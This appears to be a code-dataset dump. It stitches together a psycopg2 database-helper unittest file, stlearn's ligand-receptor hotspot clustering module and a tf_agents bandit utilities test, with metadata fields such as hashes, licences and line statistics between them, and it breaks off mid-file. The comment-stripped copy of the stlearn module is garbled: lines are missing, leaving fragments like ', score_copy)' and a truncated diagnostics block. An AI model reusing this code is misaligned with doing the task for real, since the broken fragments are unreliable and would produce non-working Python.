VALUES ('Mahe Drysdale')''', pprint=True)
self.assertEqual(insert1, 1)
insert2 = db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''',
params=('Ondrej Synek',),
pprint=True)
self.assertEqual(insert2, 1)
delete = db.update_db('''
DELETE FROM test_table WHERE name = 'Ondrej Synek'
''', pprint=True)
self.assertEqual(delete, 1)
def test_dicts_query(self):
val = 'new row'
db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''', params=(val,), pprint=False)
dicts = db.get_dicts_from_query('''
SELECT * FROM test_table
''', pprint=True)
pprint(dicts)
self.assertEqual(dicts[0].get('name'),val)
#self.assertEqual(dicts[0], dict)
def test_arr_query(self):
val = 'Damir Martin'
db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''',
params=(val,),
pprint=True)
arr = db.get_arr_from_query('''
SELECT * FROM test_table
''', pprint=True)
self.assertEqual(arr[1][0], val)
self.assertEqual(len(arr), 2)
self.assertEqual(type(arr), list)
def test_df_query(self):
print('testing get_df_from_query method....')
TEST_ROW = 'one test row'
db.update_db('drop table if exists test_table;', pprint=False)
db.update_db('create table if not exists test_table(name varchar);', pprint=False)
db.update_db("insert into test_table(name) values (%s)", params=(TEST_ROW,), pprint=False)
df = db.get_df_from_query('''
SELECT * FROM test_table
''', pprint=False)
self.assertEqual(df['name'][0], TEST_ROW)
def test_transaction(self):
sql_list = [
'''
DROP TABLE IF EXISTS transaction_table
''',
'''
CREATE TABLE IF NOT EXISTS transaction_table(a_col varchar(20) PRIMARY KEY)
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('first test row')
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('second test row')
''',
'''
DROP TABLE transaction_table
'''
]
expected_output = [-1, -1, -1, 1, 1, -1]
row_update = db.transaction(sql_list, pprint=False)
self.assertEqual(row_update, expected_output)
sql_list = [
'''
DROP TABLE if exists transaction_table
''',
'''
CREATE TABLE IF NOT EXISTS transaction_table(a_col varchar(20) PRIMARY KEY)
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('first test row')
''',
'''
SELECT sql_sytnax_error FORM TALBE
'''
]
self.assertRaises(Exception, db.transaction, sql_list, pprint=False)
self.assertRaises(psycopg2.errors.UndefinedTable, db.update_db, 'SELECT * FROM transaction_table', pprint=False)
def test_write_arr_to_table(self):
testArray = [
['v1','v2','v3','v4','v5'],
['a1','a2','a3','a4','a5'],
['b1','b2','b3','b4','b5'],
['c1','c2','c3','c4','c5'],
['d1','d2','d3','d4','d5']
]
tablename = 'test_table'
columns = ['column1','column2','column3','column4','column5']
db.write_arr_to_table(testArray,tablename, columns)
row_count = db.get_arr_from_query('SELECT COUNT(*) FROM test_table')
element = db.get_arr_from_query('SELECT column1 FROM test_table')
self.assertEqual(row_count[1], [5])
self.assertEqual(element[1:], [['v1'], ['a1'], ['b1'], ['c1'], ['d1']])
def test_csv_to_table(self):
db.csv_to_table('sample.csv', 'csv_test_table', append=False)
columnArray = None
csv_row_count = None
with open("sample.csv", "r") as f:
columnsString = f.readline()
columnsString = columnsString.replace('\n','')
columnsString = columnsString.replace('_',' ')
columnsString = columnsString.lower()
columnArray = columnsString.split(',')
reader = csv.reader(f, delimiter = ',')
data = list(reader)
csv_row_count = len(data)
column_list = db.get_arr_from_query('''
SELECT column_name
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'csv_test_table'
''')
column_list = column_list[1:]
result_list = []
for c in column_list:
result_list.append(c[0].replace('_',' '))
sql_row_count = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table', pprint=True)
self.assertEqual(columnArray, result_list)
self.assertEqual(csv_row_count, sql_row_count[1][0])
def test_copy_expert(self):
db.csv_to_table('sample.csv', 'csv_test_table', append=False)
#dump to file
sql_dump = """COPY csv_test_table
TO STDOUT
WITH CSV HEADER"""
with open("copy_expert_dump.csv",'w+') as f:
db.copy_expert(sql_dump, f)
with open("copy_expert_dump.csv", "r") as f:
reader = csv.reader(f, delimiter = ",")
data = list(reader)
csv_row_count1 = len(data)
sql_row_count1 = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table', pprint=True)
self.assertEqual(sql_row_count1[1][0]+1, csv_row_count1)
#load from file
db.update_db('TRUNCATE csv_test_table', pprint=True)
sql_load = """COPY csv_test_table
FROM STDIN
WITH CSV HEADER"""
with open('sample.csv','r') as f:
db.copy_expert(sql_load, f)
with open('sample.csv', 'r') as f:
reader = csv.reader(f, delimiter = ',')
data = list(reader)
csv_row_count2 = len(data)
sql_row_count2 = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table')
self.assertEqual(csv_row_count2, sql_row_count2[1][0]+1)
unittest.main() | 28.297521 | 120 | 0.580169 | import unittest
import sys
import os
import csv
import psycopg2
from pprint import pprint
sys.path.insert(0, '..')
from db_utils.pg_connect import pg_connect
config_file = 'databases.conf'
db = pg_connect('postgres', config_file)
table = 'test_table'
class test_pg_connect(unittest.TestCase):
def setUp(self):
db.update_db('DROP TABLE IF EXISTS test_table;')
db.update_db('CREATE TABLE IF NOT EXISTS test_table(name VARCHAR);')
db.update_db('DROP TABLE IF EXISTS csv_test_table')
def tearDown(self):
db.update_db('DROP TABLE IF EXISTS test_table;')
def test_updatedb(self):
insert1 = db.update_db('''
INSERT INTO test_table(name)
VALUES ('Mahe Drysdale')''', pprint=True)
self.assertEqual(insert1, 1)
insert2 = db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''',
params=('Ondrej Synek',),
pprint=True)
self.assertEqual(insert2, 1)
delete = db.update_db('''
DELETE FROM test_table WHERE name = 'Ondrej Synek'
''', pprint=True)
self.assertEqual(delete, 1)
def test_dicts_query(self):
val = 'new row'
db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''', params=(val,), pprint=False)
dicts = db.get_dicts_from_query('''
SELECT * FROM test_table
''', pprint=True)
pprint(dicts)
self.assertEqual(dicts[0].get('name'),val)
def test_arr_query(self):
val = 'Damir Martin'
db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''',
params=(val,),
pprint=True)
arr = db.get_arr_from_query('''
SELECT * FROM test_table
''', pprint=True)
self.assertEqual(arr[1][0], val)
self.assertEqual(len(arr), 2)
self.assertEqual(type(arr), list)
def test_df_query(self):
print('testing get_df_from_query method....')
TEST_ROW = 'one test row'
db.update_db('drop table if exists test_table;', pprint=False)
db.update_db('create table if not exists test_table(name varchar);', pprint=False)
db.update_db("insert into test_table(name) values (%s)", params=(TEST_ROW,), pprint=False)
df = db.get_df_from_query('''
SELECT * FROM test_table
''', pprint=False)
self.assertEqual(df['name'][0], TEST_ROW)
def test_transaction(self):
sql_list = [
'''
DROP TABLE IF EXISTS transaction_table
''',
'''
CREATE TABLE IF NOT EXISTS transaction_table(a_col varchar(20) PRIMARY KEY)
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('first test row')
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('second test row')
''',
'''
DROP TABLE transaction_table
'''
]
expected_output = [-1, -1, -1, 1, 1, -1]
row_update = db.transaction(sql_list, pprint=False)
self.assertEqual(row_update, expected_output)
sql_list = [
'''
DROP TABLE if exists transaction_table
''',
'''
CREATE TABLE IF NOT EXISTS transaction_table(a_col varchar(20) PRIMARY KEY)
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('first test row')
''',
'''
SELECT sql_sytnax_error FORM TALBE
'''
]
self.assertRaises(Exception, db.transaction, sql_list, pprint=False)
self.assertRaises(psycopg2.errors.UndefinedTable, db.update_db, 'SELECT * FROM transaction_table', pprint=False)
def test_write_arr_to_table(self):
testArray = [
['v1','v2','v3','v4','v5'],
['a1','a2','a3','a4','a5'],
['b1','b2','b3','b4','b5'],
['c1','c2','c3','c4','c5'],
['d1','d2','d3','d4','d5']
]
tablename = 'test_table'
columns = ['column1','column2','column3','column4','column5']
db.write_arr_to_table(testArray,tablename, columns)
row_count = db.get_arr_from_query('SELECT COUNT(*) FROM test_table')
element = db.get_arr_from_query('SELECT column1 FROM test_table')
self.assertEqual(row_count[1], [5])
self.assertEqual(element[1:], [['v1'], ['a1'], ['b1'], ['c1'], ['d1']])
def test_csv_to_table(self):
db.csv_to_table('sample.csv', 'csv_test_table', append=False)
columnArray = None
csv_row_count = None
with open("sample.csv", "r") as f:
columnsString = f.readline()
columnsString = columnsString.replace('\n','')
columnsString = columnsString.replace('_',' ')
columnsString = columnsString.lower()
columnArray = columnsString.split(',')
reader = csv.reader(f, delimiter = ',')
data = list(reader)
csv_row_count = len(data)
column_list = db.get_arr_from_query('''
SELECT column_name
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'csv_test_table'
''')
column_list = column_list[1:]
result_list = []
for c in column_list:
result_list.append(c[0].replace('_',' '))
sql_row_count = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table', pprint=True)
self.assertEqual(columnArray, result_list)
self.assertEqual(csv_row_count, sql_row_count[1][0])
def test_copy_expert(self):
db.csv_to_table('sample.csv', 'csv_test_table', append=False)
sql_dump = """COPY csv_test_table
TO STDOUT
WITH CSV HEADER"""
with open("copy_expert_dump.csv",'w+') as f:
db.copy_expert(sql_dump, f)
with open("copy_expert_dump.csv", "r") as f:
reader = csv.reader(f, delimiter = ",")
data = list(reader)
csv_row_count1 = len(data)
sql_row_count1 = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table', pprint=True)
self.assertEqual(sql_row_count1[1][0]+1, csv_row_count1)
db.update_db('TRUNCATE csv_test_table', pprint=True)
sql_load = """COPY csv_test_table
FROM STDIN
WITH CSV HEADER"""
with open('sample.csv','r') as f:
db.copy_expert(sql_load, f)
with open('sample.csv', 'r') as f:
reader = csv.reader(f, delimiter = ',')
data = list(reader)
csv_row_count2 = len(data)
sql_row_count2 = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table')
self.assertEqual(csv_row_count2, sql_row_count2[1][0]+1)
unittest.main() | true | true |
f725e6c764dab91197ce2e121ea19b4508af987d | 8,933 | py | Python | stlearn/tools/microenv/cci/base_grouping.py | duypham2108/stLearn | 91b6bae91b29aba8b4f055bf92da13f1558ddbe8 | [
"BSD-3-Clause"
] | null | null | null | stlearn/tools/microenv/cci/base_grouping.py | duypham2108/stLearn | 91b6bae91b29aba8b4f055bf92da13f1558ddbe8 | [
"BSD-3-Clause"
] | null | null | null | stlearn/tools/microenv/cci/base_grouping.py | duypham2108/stLearn | 91b6bae91b29aba8b4f055bf92da13f1558ddbe8 | [
"BSD-3-Clause"
] | 1 | 2019-12-12T12:46:55.000Z | 2019-12-12T12:46:55.000Z | """ Performs LR analysis by grouping LR pairs which having hotspots across
similar tissues.
"""
from stlearn.pl import het_plot
from sklearn.cluster import DBSCAN, AgglomerativeClustering
from anndata import AnnData
from tqdm import tqdm
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
def get_hotspots(
adata: AnnData,
lr_scores: np.ndarray,
lrs: np.array,
eps: float,
quantile=0.05,
verbose=True,
plot_diagnostics: bool = False,
show_plot: bool = False,
):
"""Determines the hotspots for the inputted scores by progressively setting more stringent cutoffs & clustering in space, chooses point which maximises number of clusters.
Parameters
----------
adata: AnnData The data object
lr_scores: np.ndarray LR_pair*Spots containing the LR scores.
lrs: np.array The LR_pairs, in-line with the rows of scores.
eps: float The eps parameter used in DBScan to get the number of clusters.
quantile: float The quantiles to use for the cutoffs, if 0.05 then will take non-zero quantiles of 0.05, 0.1,..., 1 quantiles to cluster.
Returns
-------
lr_hot_scores: np.ndarray, lr_cutoffs: np.array First is the LR scores for just the hotspots, second is the cutoff used to get those LR_scores.
"""
coors = adata.obs[["imagerow", "imagecol"]].values
lr_summary, lr_hot_scores = hotspot_core(
lr_scores, lrs, coors, eps, quantile, plot_diagnostics, adata
)
if plot_diagnostics and show_plot: # Showing the diagnostic plotting #
plt.show()
if verbose:
print("Clustering LRs to help with ranking/interpretation...")
# Clustering the LR pairs to obtain a set of clusters so to order within
# each cluster
clusterer = AgglomerativeClustering(
affinity="euclidean", linkage="ward", distance_threshold=10, n_clusters=None
)
clusterer.fit(lr_hot_scores > 0)
dist_cutoff = np.quantile(clusterer.distances_, 0.98)
clusterer = AgglomerativeClustering(
affinity="euclidean",
linkage="ward",
distance_threshold=dist_cutoff,
n_clusters=None,
)
clusters = clusterer.fit_predict(lr_hot_scores > 0)
cluster_set = np.unique(clusters)
if verbose:
print("Ranking LRs...")
# Determining the ordering of the clusters so is useful to user #
cluster_mean_spots = []
for cluster in cluster_set:
cluster_bool = clusters == cluster
cluster_mean_spots.append(np.mean(lr_summary[cluster_bool, 2]))
cluster_order = np.argsort(-np.array(cluster_mean_spots))
# Determining order of lrs in cluster & also overall cluster scores #
lr_order = []
new_clusters = []
cluster_scores = np.zeros((adata.shape[0], len(cluster_set)))
for i, index in enumerate(cluster_order):
cluster = cluster_set[index]
cluster_indices = np.where(clusters == cluster)[0]
lr_order_ = np.argsort(-lr_summary[cluster_indices, 2])
lr_order.extend(cluster_indices[lr_order_])
new_clusters += [i] * len(cluster_indices)
cluster_scores[:, i] = lr_hot_scores[cluster_indices, :].mean(axis=0)
if verbose:
print("Saving results:")
# Re-ordering the summary & the scores #
lrs = lrs[lr_order]
lr_summary = lr_summary[lr_order, :]
lr_summary[:, 3] = new_clusters
lr_summary = pd.DataFrame(
lr_summary,
index=lrs,
columns=["spot_counts", "cutoff", "hotspot_counts", "lr_cluster"],
)
lr_scores = lr_scores[lr_order, :].transpose()
lr_hot_scores = lr_hot_scores[lr_order, :].transpose()
# Adding all this information to the AnnData #
adata.uns["lr_summary"] = lr_summary
adata.obsm["lr_scores"] = lr_scores
adata.obsm["lr_hot_scores"] = lr_hot_scores
adata.obsm["cluster_scores"] = cluster_scores
if verbose:
print(f"\tSummary values of lrs in adata.uns['lr_summary'].")
print(
f"\tMatrix of lr scores in same order as the summary in adata.obsm['lr_scores']."
)
print(f"\tMatrix of the hotspot scores in adata.obsm['lr_hot_scores'].")
print(
f"\tMatrix of the mean LR cluster scores in adata.obsm['cluster_scores']."
)
def hotspot_core(
lr_scores,
lrs,
coors,
eps,
quantile,
plot_diagnostics=False,
adata=None,
verbose=True,
max_score=False,
):
"""Made code for getting the hotspot information."""
score_copy = lr_scores.copy()
quantiles = [quantile * i for i in range(int(1 / quantile))]
# Values to return #
lr_hot_scores = np.zeros(score_copy.shape)
# cols: spot_counts, cutoff, hotspot_counts, lr_cluster
lr_summary = np.zeros((score_copy.shape[0], 4))
### Also creating grouping lr_pairs by quantiles to plot diagnostics ###
if plot_diagnostics:
lr_quantiles = [(i / 6) for i in range(1, 7)][::-1]
lr_mean_scores = np.apply_along_axis(non_zero_mean, 1, score_copy)
lr_quant_values = np.quantile(lr_mean_scores, lr_quantiles)
quant_lrs = np.array(
[lrs[lr_mean_scores == quant] for quant in lr_quant_values]
)
fig, axes = plt.subplots(6, 4, figsize=(20, 15))
# Determining the cutoffs for hotspots #
with tqdm(
total=len(lrs),
desc="Removing background lr scores...",
bar_format="{l_bar}{bar}",
disable=verbose == False,
) as pbar:
for i, lr_ in enumerate(lrs):
lr_score_ = score_copy[i, :]
lr_summary[i, 0] = len(np.where(lr_score_ > 0)[0])
cutoff_scores = []
cutoffs = np.quantile(lr_score_[lr_score_ > 0], quantiles)
for cutoff in cutoffs:
spot_bool = lr_score_ >= cutoff
if len(np.where(spot_bool)[0]) == 0:
cutoff_scores.append(0)
continue
coor_ = coors[spot_bool, :]
clusters = DBSCAN(
min_samples=2, eps=eps, metric="manhattan"
).fit_predict(coor_)
score = len(np.unique(clusters)) * (np.mean(lr_score_[spot_bool])) ** 2
cutoff_scores.append(score)
# Cutoff point where maximum number of clusters occurs #
best_cutoff = cutoffs[np.argmax(cutoff_scores)]
if not max_score:
lr_summary[i, 1] = best_cutoff
else:
lr_summary[i, 1] = cutoff_scores[np.argmax(cutoff_scores)]
lr_score_[lr_score_ < best_cutoff] = 0
lr_hot_scores[i, :] = lr_score_
lr_summary[i, 2] = len(np.where(lr_score_ > 0)[0])
# Adding the diagnostic plots #
if plot_diagnostics and lr_ in quant_lrs and type(adata) != type(None):
add_diagnostic_plots(
adata,
i,
lr_,
quant_lrs,
lr_quantiles,
lr_scores,
lr_hot_scores,
axes,
cutoffs,
cutoff_scores,
best_cutoff,
)
pbar.update(1)
return lr_summary, lr_hot_scores
def non_zero_mean(vals):
"""Gives the non-zero mean of the values."""
return vals[vals > 0].mean()
def add_diagnostic_plots(
adata,
i,
lr_,
quant_lrs,
lr_quantiles,
lr_scores,
lr_hot_scores,
axes,
cutoffs,
n_clusters,
best_cutoff,
):
"""Adds diagnostic plots for the quantile LR pair to a figure to illustrate \
how the cutoff is functioning.
"""
q_i = np.where(quant_lrs == lr_)[0][0]
# Scatter plot #
axes[q_i][0].scatter(cutoffs, n_clusters)
axes[q_i][0].set_title(f"n_clusts*mean_spot_score vs cutoff")
axes[q_i][0].set_xlabel("cutoffs")
axes[q_i][0].set_ylabel("n_clusts*mean_spot_score")
# Distribution of scores with cutoff #
scores_ = lr_scores[i, :]
sb.distplot(
scores_[scores_ > 0],
ax=axes[q_i][1],
hist=True,
kde=False,
color="red",
norm_hist=True,
)
v_height = 0.5
axes[q_i][1].vlines(best_cutoff, 0, v_height)
axes[q_i][1].text(best_cutoff, v_height, str(round(best_cutoff, 2)))
axes[q_i][1].set_title(f"Distrib {round(lr_quantiles[q_i], 2)}({lr_})")
# Showing before & after filtering spots #
adata.obsm["lr_scores"] = scores_
het_plot(
adata,
use_het="lr_scores",
ax=axes[q_i][2],
show_color_bar=False,
)
axes[q_i][2].set_title("scores")
adata.obsm["lr_scores"] = lr_hot_scores[i, :]
het_plot(
adata,
use_het="lr_scores",
ax=axes[q_i][3],
show_color_bar=False,
)
axes[q_i][3].set_title("hotspot scores")
| 33.085185 | 175 | 0.614799 |
from stlearn.pl import het_plot
from sklearn.cluster import DBSCAN, AgglomerativeClustering
from anndata import AnnData
from tqdm import tqdm
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
def get_hotspots(
adata: AnnData,
lr_scores: np.ndarray,
lrs: np.array,
eps: float,
quantile=0.05,
verbose=True,
plot_diagnostics: bool = False,
show_plot: bool = False,
):
coors = adata.obs[["imagerow", "imagecol"]].values
lr_summary, lr_hot_scores = hotspot_core(
lr_scores, lrs, coors, eps, quantile, plot_diagnostics, adata
)
if plot_diagnostics and show_plot: plt.show()
if verbose:
print("Clustering LRs to help with ranking/interpretation...")
clusterer = AgglomerativeClustering(
affinity="euclidean", linkage="ward", distance_threshold=10, n_clusters=None
)
clusterer.fit(lr_hot_scores > 0)
dist_cutoff = np.quantile(clusterer.distances_, 0.98)
clusterer = AgglomerativeClustering(
affinity="euclidean",
linkage="ward",
distance_threshold=dist_cutoff,
n_clusters=None,
)
clusters = clusterer.fit_predict(lr_hot_scores > 0)
cluster_set = np.unique(clusters)
if verbose:
print("Ranking LRs...")
cluster_mean_spots = []
for cluster in cluster_set:
cluster_bool = clusters == cluster
cluster_mean_spots.append(np.mean(lr_summary[cluster_bool, 2]))
cluster_order = np.argsort(-np.array(cluster_mean_spots))
lr_order = []
new_clusters = []
cluster_scores = np.zeros((adata.shape[0], len(cluster_set)))
for i, index in enumerate(cluster_order):
cluster = cluster_set[index]
cluster_indices = np.where(clusters == cluster)[0]
lr_order_ = np.argsort(-lr_summary[cluster_indices, 2])
lr_order.extend(cluster_indices[lr_order_])
new_clusters += [i] * len(cluster_indices)
cluster_scores[:, i] = lr_hot_scores[cluster_indices, :].mean(axis=0)
if verbose:
print("Saving results:")
lrs = lrs[lr_order]
lr_summary = lr_summary[lr_order, :]
lr_summary[:, 3] = new_clusters
lr_summary = pd.DataFrame(
lr_summary,
index=lrs,
columns=["spot_counts", "cutoff", "hotspot_counts", "lr_cluster"],
)
lr_scores = lr_scores[lr_order, :].transpose()
lr_hot_scores = lr_hot_scores[lr_order, :].transpose()
adata.uns["lr_summary"] = lr_summary
adata.obsm["lr_scores"] = lr_scores
adata.obsm["lr_hot_scores"] = lr_hot_scores
adata.obsm["cluster_scores"] = cluster_scores
if verbose:
print(f"\tSummary values of lrs in adata.uns['lr_summary'].")
print(
f"\tMatrix of lr scores in same order as the summary in adata.obsm['lr_scores']."
)
print(f"\tMatrix of the hotspot scores in adata.obsm['lr_hot_scores'].")
print(
f"\tMatrix of the mean LR cluster scores in adata.obsm['cluster_scores']."
)
def hotspot_core(
lr_scores,
lrs,
coors,
eps,
quantile,
plot_diagnostics=False,
adata=None,
verbose=True,
max_score=False,
):
score_copy = lr_scores.copy()
quantiles = [quantile * i for i in range(int(1 / quantile))]
lr_hot_scores = np.zeros(score_copy.shape)
lr_summary = np.zeros((score_copy.shape[0], 4))
, score_copy)
lr_quant_values = np.quantile(lr_mean_scores, lr_quantiles)
quant_lrs = np.array(
[lrs[lr_mean_scores == quant] for quant in lr_quant_values]
)
fig, axes = plt.subplots(6, 4, figsize=(20, 15))
with tqdm(
total=len(lrs),
desc="Removing background lr scores...",
bar_format="{l_bar}{bar}",
disable=verbose == False,
) as pbar:
for i, lr_ in enumerate(lrs):
lr_score_ = score_copy[i, :]
lr_summary[i, 0] = len(np.where(lr_score_ > 0)[0])
cutoff_scores = []
cutoffs = np.quantile(lr_score_[lr_score_ > 0], quantiles)
for cutoff in cutoffs:
spot_bool = lr_score_ >= cutoff
if len(np.where(spot_bool)[0]) == 0:
cutoff_scores.append(0)
continue
coor_ = coors[spot_bool, :]
clusters = DBSCAN(
min_samples=2, eps=eps, metric="manhattan"
).fit_predict(coor_)
score = len(np.unique(clusters)) * (np.mean(lr_score_[spot_bool])) ** 2
cutoff_scores.append(score)
best_cutoff = cutoffs[np.argmax(cutoff_scores)]
if not max_score:
lr_summary[i, 1] = best_cutoff
else:
lr_summary[i, 1] = cutoff_scores[np.argmax(cutoff_scores)]
lr_score_[lr_score_ < best_cutoff] = 0
lr_hot_scores[i, :] = lr_score_
lr_summary[i, 2] = len(np.where(lr_score_ > 0)[0])
if plot_diagnostics and lr_ in quant_lrs and type(adata) != type(None):
add_diagnostic_plots(
adata,
i,
lr_,
quant_lrs,
lr_quantiles,
lr_scores,
lr_hot_scores,
axes,
cutoffs,
cutoff_scores,
best_cutoff,
)
pbar.update(1)
return lr_summary, lr_hot_scores
def non_zero_mean(vals):
return vals[vals > 0].mean()
def add_diagnostic_plots(
adata,
i,
lr_,
quant_lrs,
lr_quantiles,
lr_scores,
lr_hot_scores,
axes,
cutoffs,
n_clusters,
best_cutoff,
):
q_i = np.where(quant_lrs == lr_)[0][0]
axes[q_i][0].scatter(cutoffs, n_clusters)
axes[q_i][0].set_title(f"n_clusts*mean_spot_score vs cutoff")
axes[q_i][0].set_xlabel("cutoffs")
axes[q_i][0].set_ylabel("n_clusts*mean_spot_score")
scores_ = lr_scores[i, :]
sb.distplot(
scores_[scores_ > 0],
ax=axes[q_i][1],
hist=True,
kde=False,
color="red",
norm_hist=True,
)
v_height = 0.5
axes[q_i][1].vlines(best_cutoff, 0, v_height)
axes[q_i][1].text(best_cutoff, v_height, str(round(best_cutoff, 2)))
axes[q_i][1].set_title(f"Distrib {round(lr_quantiles[q_i], 2)}({lr_})")
adata.obsm["lr_scores"] = scores_
het_plot(
adata,
use_het="lr_scores",
ax=axes[q_i][2],
show_color_bar=False,
)
axes[q_i][2].set_title("scores")
adata.obsm["lr_scores"] = lr_hot_scores[i, :]
het_plot(
adata,
use_het="lr_scores",
ax=axes[q_i][3],
show_color_bar=False,
)
axes[q_i][3].set_title("hotspot scores")
| true | true |
f725e6deed60db8da5ead0d23368ad990e104030 | 5,821 | py | Python | tf_agents/bandits/agents/utils_test.py | MarkDaoust/agents | 00ddf75a8a35a26a03a9323b78d95c06211b5b3f | [
"Apache-2.0"
] | null | null | null | tf_agents/bandits/agents/utils_test.py | MarkDaoust/agents | 00ddf75a8a35a26a03a9323b78d95c06211b5b3f | [
"Apache-2.0"
] | null | null | null | tf_agents/bandits/agents/utils_test.py | MarkDaoust/agents | 00ddf75a8a35a26a03a9323b78d95c06211b5b3f | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tf_agents.bandits.agents.utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
import tensorflow_probability as tfp
from tf_agents.bandits.agents import utils
from tf_agents.specs import tensor_spec
tfd = tfp.distributions
tf.compat.v1.enable_v2_behavior()
def test_cases():
return parameterized.named_parameters(
{
'testcase_name': '_batch1_contextdim10',
'batch_size': 1,
'context_dim': 10,
}, {
'testcase_name': '_batch4_contextdim5',
'batch_size': 4,
'context_dim': 5,
})
class UtilsTest(tf.test.TestCase, parameterized.TestCase):
def testNumActionsFromTensorSpecGoodSpec(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=15)
num_actions = utils.get_num_actions_from_tensor_spec(action_spec)
self.assertEqual(num_actions, 16)
def testNumActionsFromTensorSpecWrongRank(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(2, 3), minimum=0, maximum=15)
with self.assertRaisesRegexp(ValueError, r'Action spec must be a scalar'):
utils.get_num_actions_from_tensor_spec(action_spec)
@test_cases()
def testBUpdate(self, batch_size, context_dim):
b_array = np.array(range(context_dim))
r_array = np.array(range(batch_size)).reshape((batch_size, 1))
x_array = np.array(range(batch_size * context_dim)).reshape(
(batch_size, context_dim))
rx = r_array * x_array
expected_b_updated_array = b_array + np.sum(rx, axis=0)
b = tf.constant(b_array, dtype=tf.float32, shape=[context_dim])
r = tf.constant(r_array, dtype=tf.float32, shape=[batch_size])
x = tf.constant(x_array, dtype=tf.float32, shape=[batch_size, context_dim])
b_update = utils.sum_reward_weighted_observations(r, x)
self.assertAllClose(expected_b_updated_array, self.evaluate(b + b_update))
@test_cases()
def testBUpdateEmptyObservations(self, batch_size, context_dim):
r = tf.constant([], dtype=tf.float32, shape=[0, 1])
x = tf.constant([], dtype=tf.float32, shape=[0, context_dim])
b_update = utils.sum_reward_weighted_observations(r, x)
expected_b_update_array = np.zeros([context_dim], dtype=np.float32)
self.assertAllClose(expected_b_update_array, self.evaluate(b_update))
def testLaplacian1D(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=4)
num_actions = utils.get_num_actions_from_tensor_spec(action_spec)
laplacian_matrix = tf.convert_to_tensor(
utils.build_laplacian_over_ordinal_integer_actions(action_spec),
dtype=tf.float32)
res = tf.matmul(
laplacian_matrix, tf.ones([num_actions, 1], dtype=tf.float32))
# The vector of ones is in the null space of the Laplacian matrix.
self.assertAllClose(0.0, self.evaluate(tf.norm(res)))
# The row sum is zero.
row_sum = tf.reduce_sum(laplacian_matrix, 1)
self.assertAllClose(0.0, self.evaluate(tf.norm(row_sum)))
# The column sum is zero.
column_sum = tf.reduce_sum(laplacian_matrix, 0)
self.assertAllClose(0.0, self.evaluate(tf.norm(column_sum)))
# The diagonal elements are 2.0.
self.assertAllClose(2.0, laplacian_matrix[1, 1])
laplacian_matrix_expected = np.array(
[[1.0, -1.0, 0.0, 0.0, 0.0],
[-1.0, 2.0, -1.0, 0.0, 0.0],
[0.0, -1.0, 2.0, -1.0, 0.0],
[0.0, 0.0, -1.0, 2.0, -1.0],
[0.0, 0.0, 0.0, -1.0, 1.0]])
self.assertAllClose(laplacian_matrix_expected,
self.evaluate(laplacian_matrix))
def testComputePairwiseDistances(self):
input_vects = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
pdist_matrix = np.array(
[[0.0, 27.0, 108.0,],
[27.0, 0.0, 27.0],
[108.0, 27.0, 0.0]])
tf_dist_matrix = utils.compute_pairwise_distances(
tf.constant(input_vects, dtype=tf.float32))
self.assertAllClose(pdist_matrix, self.evaluate(tf_dist_matrix))
def testBuildLaplacianNearestNeighborGraph(self):
input_vects = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9],
[10, 11, 12], [13, 14, 15]])
num_actions = input_vects.shape[0]
laplacian_matrix = utils.build_laplacian_nearest_neighbor_graph(
tf.constant(input_vects, dtype=tf.float32), k=2)
# The vector of ones is in the null space of the Laplacian matrix.
res = tf.matmul(
laplacian_matrix, tf.ones([num_actions, 1], dtype=tf.float32))
self.assertAllClose(0.0, self.evaluate(tf.norm(res)))
# The row sum is zero.
row_sum = tf.reduce_sum(laplacian_matrix, 1)
self.assertAllClose(0.0, self.evaluate(tf.norm(row_sum)))
# The column sum is zero.
column_sum = tf.reduce_sum(laplacian_matrix, 0)
self.assertAllClose(0.0, self.evaluate(tf.norm(column_sum)))
self.assertAllClose(2.0, laplacian_matrix[0, 0])
self.assertAllClose(4.0, laplacian_matrix[2, 2])
if __name__ == '__main__':
tf.test.main()
| 38.045752 | 79 | 0.695585 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tf_agents.bandits.agents import utils
from tf_agents.specs import tensor_spec
tfd = tfp.distributions
tf.compat.v1.enable_v2_behavior()
def test_cases():
return parameterized.named_parameters(
{
'testcase_name': '_batch1_contextdim10',
'batch_size': 1,
'context_dim': 10,
}, {
